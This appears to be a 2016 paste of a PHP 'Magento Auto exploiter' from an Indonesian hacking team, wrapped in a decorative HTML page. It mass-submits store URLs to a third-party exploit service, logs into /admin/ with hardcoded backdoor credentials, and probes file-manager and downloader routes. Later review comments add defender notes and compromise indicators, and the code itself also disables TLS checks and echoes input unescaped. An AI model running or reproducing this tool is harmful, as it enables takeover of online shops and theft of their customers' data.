Wendi124

Untitled

Jun 2nd, 2016
  1. <html>
     <!-- Third-party scripts: the first is requested over plain http, the second is protocol-relative,
          and neither carries an integrity attribute. Script served by those hosts, or by anyone able to
          alter the http response, runs in this document, which also holds the form further down. -->
  2. <script type="text/javascript" src="http://ahmad-rifai-
  3. tools.googlecode.com/files/salju-blog.ahmadrifai.net.js" /></script>
  4. <script type="text/javascript" src="//www.blogger.com/static/v1/common/js/3287480799-
  5. csitail.js"></script>
     <!-- Inline call into the script loaded just above. -->
  6. <script type="text/javascript">BLOG_initCsi('classic_blogspot');</script>
  7. <style type="text/css">.cakrahide {z-index: 1000;height: 15px;width: 280px;border: 2px solid #666666;background: #D11717
  8.  
  9. -moz-linear-gradient(top,#000,#D11717);background: -webkit-gradient(linear, left top, left bottom, from(#000), to(#D11717));border-radius: 12px;-moz-border-radius:
  10.  
  11. 12px;-webkit-border-radius: 12px;-o-transition: all 1s ease-in-out;-moz-transition: all 1s ease-in-out;-webkit-transition: all 1s ease-in-out;padding: 5px 5px;margin:
  12.  
  13. 15px auto;font: 8px Metamorphous;color: #FF0000;overflow: hidden;box-shadow: 0 1px 8px #000;-moz-box-shadow: 0 1px 8px #000;-webkit-box-shadow: 0 1px 8px
  14.  
  15. #000;}.cakrahide:hover {min-height: 270px;border: 2px solid #333333;background: #111;box-shadow: 0 1px 15px #000;-moz-box-shadow: 0 1px 15px #000;-webkit-box-shadow: 0
  16.  
  17. 1px 15px #000;color: #000; text-shadow: 0 1px 1px #888;}.cakrahide h3, .isicakra h3 {font-size: 8px;font-family: Metamorphous;font-weight: bold;color:
  18.  
  19. #ffffff;text-align: center;text-shadow: 0px 1px 1px #fff; margin: 3px 5px;background: #000;border-radius: 5px;-moz-border-radius: 5px;-webkit-border-radius:
  20.  
  21. 5px;border: 1px solid #999;-o-transition: all 1s ease-in-out;-moz-transition: all 1s ease-in-out;-webkit-transition: all 1s ease-in-out;}.tejahide h3:hover
  22.  
  23. {box-shadow: 0 1px 8px #000;-moz-box-shadow: 0 1px 8px #000;-webkit-box-shadow: 0 1px 8px #000;}.cakrahide img.mini, .cakrahide img.minianima {width: 70px;border: 4px
  24.  
  25. solid #666;padding: 3px;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;float: left; margin: 0 10px 5px 0;background: #222;-o-transition: all
  26.  
  27. 1.5s;-moz-transition: all 1.5s;-webkit-transition: all 1.5s;}.cakrahide img.mini:hover, .cakrahide img.minianima:hover {box-shadow: 1px 1px 15px #000;-moz-box-shadow:
  28.  
  29. 1px 1px 15px #000;-webkit-box-shadow: 1px 1px 15px #000;border: 4px solid #CCCCCC;background :#666;-o-transform: scale(1.4);-moz-transform:
  30.  
  31. scale(1.4);-webkit-transform: scale(1.4);margin-top: 20px;margin-left: 15px;}.tejahide img.minianima:hover {-o-transform: scale(1.4) rotate(360deg)
  32.  
  33. translate(0px);-moz-transform: scale(1.4) rotate(360deg) translate(0px);-webkit-transform: scale(1.4) rotate(360deg) translate(0px);}.isicakra {margin-top:
  34.  
  35. 15px;height:225px;overflow: auto;padding: 0 5px;-o-transition: all 1s ease-in-out;-moz-transition: all 1s ease-in-out;-webkit-transition: all 1s ease-in-out;
  36.  
  37. background:#ddd -moz-linear-gradient(top,#ddd,#000);background:-webkit-gradient(linear, left top, left bottom, from(#ddd), to(#000));}.isicakra:hover {background:
  38.  
  39. #333;color: #eee;text-shadow: 0 0px 1px #fe0303;}.isicakra h3 {margin: 20px 0;max-width: 224px;margin-left:10px;background: #000;box-shadow: 0 1px 12px
  40.  
  41. #eee;-moz-box-shadow: 0 1px 12px #eee;-webkit-box-shadow: 0 1px 12px #eee;}.columns{clear:both;line-height:22px;padding:0 0
  42.  
  43. 20px;width:250px}.colleft{float:left;line-height:22px;width:120px}.colright{float:right;line-height:22px;width:120px}.isicakra h3:hover {background: #888;border: 1px
  44.  
  45. solid #666;box-shadow: 0 1px 12px #fff;-moz-box-shadow: 0 1px 12px #fff;-webkit-box-shadow: 0 1px 12px #fff;}.isicakra ul {padding: 0;margin: 0;list-style:
  46.  
  47. none;}.isicakra li {padding: 0;margin: 0;list-style: none;border-bottom:1px dotted #777;}.isicakra li a{color: #FF0000;padding: 0;margin:
  48.  
  49. 0;text-decoration:none;font-size: 12px;-o-transition: all 1.5s;-moz-transition: all 1.5s;-webkit-transition: all 1.5s;}.isicakra li a:hover {-o-transform:
  50.  
  51. scale(1.1);-moz-transform: scale(1.1);-webkit-transform: scale(1.1);color: red;text-shadow: 0 1px 1px #000;margin-left: 20px;}.cakrahide {height: 17px; float:right
  52.  
  53. ;margin-top:0px;z-index: 10000;position: fixed;top:0px;margin-left:690px;} .cakrahide h3, .isicakra {font-size: 11px;}</style>
  54. <div class="cakrahide">
  55. <h3>Contact Me click here!</h3>
  56. <div class="isicakra">
  57. <h3>Welcome</h3>
  58. My name WE N DI a.k.a Unknown7
  59. <div class="columns">
  60. <div class="colleft">
  61. <h3>FansPage my Team</h3>
  62. <ul>
  63.  
  64. <li><a rel="nofollow" href="https://www.facebook.com/RabbitSecOfficial/?fref=ts" target="_blank" title="INDONESIAN CODE PARTY</a></li>
  65. </ul>
  66. </div>
  67. <div class="colright">
  68. <h3>Social</h3>
  69. <ul>
  70. <li><a rel="nofollow" href="https://www.facebook.com/Unknown7.go.id?fref=ts" target="_blank" title="HANDOKO FUJI">Facebook</a></li>
  71.  
  72. </ul>
  73. </div>
  74. </div>
  75.  
  76. </div>
  77. </div>
  78. </div>
  79. <div class='clear'></div>
  80. <span class='widget-item-control'>
  81. <span class='item-control blog-admin'>
  82. <center><h1>Magento Auto exploiter</h1>
  83. <style>html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}body {background: url(https://images7.alphacoders.com/392/392510.jpg);margin:0;padding:0;background-size:100% 100%}</style>
  84.  
  85.  
  86. <?php
      // cover(): returns the fixed HTML banner that is echoed once at the top of the page.
      // Takes no arguments and reads no request data.
  87. function cover() {
  88. return "<center>[+] Magento Auto Exploit [+]<br>
  89. ## -= Rabbit Security Team - Sanjungan Jiwa =- ##<br>
  90. ## ##<br><br></center>";
  91. }
  92. function ngcurl($url,$post=null) {
      // Sends one HTTP request to $url with cURL and returns the result of curl_exec()
      // (the response body as a string, because CURLOPT_RETURNTRANSFER is set below).
      // $post: when it compares != null (loose comparison) the request is a POST with $post as
      // the body; otherwise no method is set and cURL's default applies.
  93. $ch = curl_init($url);
  94. if($post != null) {
  95. curl_setopt($ch, CURLOPT_POST, true);
  96. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  97. }
  98. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      // One cookie file, relative to the working directory, is read and written by every call.
      // Cookies received during a run are left on disk in that file.
  99. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  100. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  101. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
      // Redirects are followed, so the final response may come from a host other than $url.
  102. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
      // Certificate and host-name verification are both switched off: an https response is accepted
      // from any endpoint, so nothing read through this helper is authenticated. Not a pattern to
      // copy into other code.
  103. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  104. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  105. return curl_exec($ch);
      // Unreachable: the return above leaves the function first, so the handle is never closed here.
  106. curl_close($ch);
  107. }
  108. function ambilKata($param, $kata1, $kata2){
      // Returns the text of $param that lies between the first occurrence of $kata1 and the next
      // occurrence of $kata2 after it. Returns FALSE when either marker is absent from $param.
      // (Indonesian: "ambil kata" is roughly "take word".)
  109. if(strpos($param, $kata1) === FALSE) return FALSE;
  110. if(strpos($param, $kata2) === FALSE) return FALSE;
      // $start is the offset just past $kata1; the search for $kata2 begins there.
  111. $start = strpos($param, $kata1) + strlen($kata1);
      // Not re-checked: if $kata2 occurs only before $start, strpos() yields false here.
  112. $end = strpos($param, $kata2, $start);
  113. $return = substr($param, $start, $end - $start);
  114. return $return;
  115. }
  116. echo cover();
  117. ?>
  118. <?php
      // Analyst summary (defender view). For each CRLF-separated URL in the POST field 'target'
      // this block: (1) posts the URL to a third-party endpoint and trusts a success string in the
      // reply, (2) attempts an admin login on the site with hardcoded credentials, (3) checks whether
      // a file-manager admin route and /downloader/ respond. The exploit step itself is not in this
      // file, and the page does not say which Magento flaw the remote service relies on.
      // Review aids for a Magento store, all taken from this listing: admin user names
      // "nyanazunyan" and "malang"; requests to /admin/, /filesystem/adminhtml_filesystem/ and
      // /downloader/ arriving together. Usual response: apply the vendor's security patches, audit
      // the admin user table, restrict /admin/ and /downloader/ by source address.
      // Both POST fields are read before the isset() test, so a plain GET raises undefined-index
      // notices; $go is then null, isset($go) is false and the form in the else branch is shown.
  119. $link = explode("\r\n", $_POST['target']);
  120. $go = $_POST['go'];
  121. if(isset($go)) {
  122. foreach($link as $url) {
      // Every submitted URL is disclosed to this third-party host over plain http. The reply is not
      // authenticated, so the "success" verdict below is whatever that host, or anything on the
      // network path, chooses to return.
  123. $post_to_fatoni = array(
  124. "url" => $url,
  125. "hajar" => "Xploit!",
  126. );
  127. $curl_fatoni = ngcurl("http://fatoni.id/malangXploit.php", $post_to_fatoni);
      // Indonesian in the pattern: "mulai mengecek login" is roughly "starting to check login".
  128. if(preg_match("/Exploiting Success, mulai mengecek login../", $curl_fatoni)) {
      // $url comes straight from the request and is written into the markup without
      // htmlspecialchars(), both as an attribute value and as link text.
  129. echo "Target: <a href='$url' target='_blank'>$url</a><br>";
  130. echo "Status: Sukses Di Xploit<br>";
  131. echo "Ngecek Login........ ";
      // Fetches the target page and searches it for the hidden form_key field; the captured value
      // is sent with the login attempt below.
  132. $ambil = htmlspecialchars(@file_get_contents($url));
  133. preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
      // Hardcoded credentials posted to <target>/admin/.
      // NOTE(review): presumably an account the remote service tries to create; this file does not
      // show that. An admin user with this name on a store is worth treating as a compromise indicator.
  134. $post_login = array(
  135. "form_key" => $key[1],
  136. "login[username]" => "nyanazunyan",
  137. "dummy" => "",
  138. "login[password]" => "nyan187",
  139. );
  140. $login = ngcurl($url."/admin/", $post_login);
      // The login is judged only by the words "Log Out" or "malang" appearing in the reply.
  141. if(preg_match("/Log Out|malang/", $login)) {
      // Extracts the URL key that follows two admin route prefixes in the reply.
      // $key3 is assigned but not used anywhere in this listing.
  142. $key2 = ambilKata($login,"/filesystem/adminhtml_filesystem/index/key/","/");
  143. $key3 = ambilKata($login,"/system_account/index/key/","/");
  144. echo "OK<br>";
      // The credentials printed here (malang / malang87) differ from the pair posted above.
  145. echo "username: malang<br>";
  146. echo "password: malang87<br>";
  147. echo "Filesystem: ";
      // Checks whether the file-manager admin route answers with the text "File System".
      // "Ada" / "Gaada" are roughly "present" / "absent".
      // NOTE(review): the route name suggests a file-manager extension; where one is installed and
      // unused, removing it reduces what a stolen admin login can reach.
  148. $curl_filesystem = ngcurl($url."/filesystem/adminhtml_filesystem/index/key/$key2/", null);
  149. if(preg_match("/File System/", $curl_filesystem)) {
  150. echo "Ada<br>";
  151. } else {
  152. echo "Gaada<br>";
  153. }
  154. echo "Downloader: ";
  155. $post_downloader = array(
  156. "username" => "malang",
  157. "password" => "malang87",
  158. );
      // Only the host part of the URL is kept, and it is handed to ngcurl() without a scheme.
  159. $url_d = parse_url($url, PHP_URL_HOST);
  160. $curl_downloader = ngcurl($url_d."/downloader/", $post_downloader);
  161. if(preg_match("/Return to Admin|Log Out/i", $curl_downloader)) {
      // Label colour only: red when the reply contains the insufficient-write-permissions message,
      // green otherwise.
  162. if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) {
  163. $stat_down = "<font color=red>Permissions</font>";
  164. } else {
  165. $stat_down = "<font color='#008000'>Permissions</font>";
  166. }
  167. echo "Ada [ <a href='http://$url_d/downloader/' target='_blank'>http://$url_d/downloader/</a> ( $stat_down ) ]<br>";
  168. } else {
  169. echo "Gaada<br>";
  170. }
  171. } else {
      // "Gagal" is roughly "failed": the admin login check did not match.
  172. echo "Gagal<br>";
  173. }
  174. echo "<br>";
  175. } else {
      // The third-party reply lacked the success string; $url is again echoed unescaped.
  176. echo "Target: $url<br>";
  177. echo "Status: Gagal Di Xploit<br><br>";
  178. }
  179. }
  180. } else {
  181. ?>
  182. <html>
  183. <center>
  184. <form method="post">
  185. <textarea name="target" placeholder="http://monkeyshop.be/" style="width: 500px; height: 250px;"></textarea><br>
  186. <input type="submit" name="go" value="Xploit" style="width: 500px;">
  187. </form>
  188. </center>
  189. </html>
  190. <?php
  191. }
  192. ?>
  193. TUTORIAL ---->>
  194. http://gracygirl.com/baca.txt
  195. </html>